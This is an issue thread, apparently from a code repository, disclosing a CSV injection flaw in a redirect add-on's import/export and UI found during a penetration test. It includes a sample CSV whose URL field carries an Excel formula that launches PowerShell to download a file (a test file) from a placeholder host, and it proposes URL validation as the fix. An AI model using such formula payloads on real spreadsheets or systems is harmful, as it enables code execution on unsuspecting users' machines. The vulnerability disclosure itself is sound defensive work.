CSV Import / Export lacks validation and allows allows executable code to be added to uploaded / downloaded

[GeekInTheNorth]

We have had an issue raised in a penetration test which proved that there was a CSV Injection attack possible on the CSV import / export functionality of this Add-On.

How to Reproduce:

• Import redirects using a CSV which contains a CSV injection attack within one of the URL fields.
• Export redirects into a CSV file
• Open the CSV file in excel

The penetration tester was able to use CSV injection to push a powershell command into the database, when the CSV was then exported and opened in excel, the powershell script executed to download a file to the system.

This can be fixed by adding a simple URL validation for the Old and New URL fields and rejecting the CSV if any of the entries are invalid.

[valdisiljuconoks]

@GeekInTheNorth possible to share somehow file samples?

[GeekInTheNorth]

Hi @valdisiljuconoks,

I'll verify first with my client to make sure they are happy for anonymised details to be shared.

[GeekInTheNorth]

Hi @valdisiljuconoks

I have been able to manufacture the same attack without needing to share screen captures from the report.

You'll need a CSV with this content:

OldUrl,NewUrl,WildcardSkippedAppend,RedirectType
https://www.example.com/missing-page,https://www.example.com/new-page/,False,Temporary
https://www.example.com/malicious-test/,=cmd|'/C powershell IEX(wget http://www.example.com/eicar.exe -OutFile eicar.exe)'!AO,False,Temporary

The import function has no validation which then allows you to upload the CSV with it's malicious content:

When the user then exports the redirects and opens them in Excel, they receive prompts, but the user may well accept them as the CSV has come from a trusted source as far as they are concerned.

The simplest thing we can do here is to apply a URL verification on the CSV before we push it into the database. I haven't tested if the same can be achieved through the XML import / export, but the same validation would help.

Regards,
Mark Stott

[GeekInTheNorth]

@valdisiljuconoks

It also turns out you can perform this attack direct in the UI as neither OLD or NEW url fields have validation: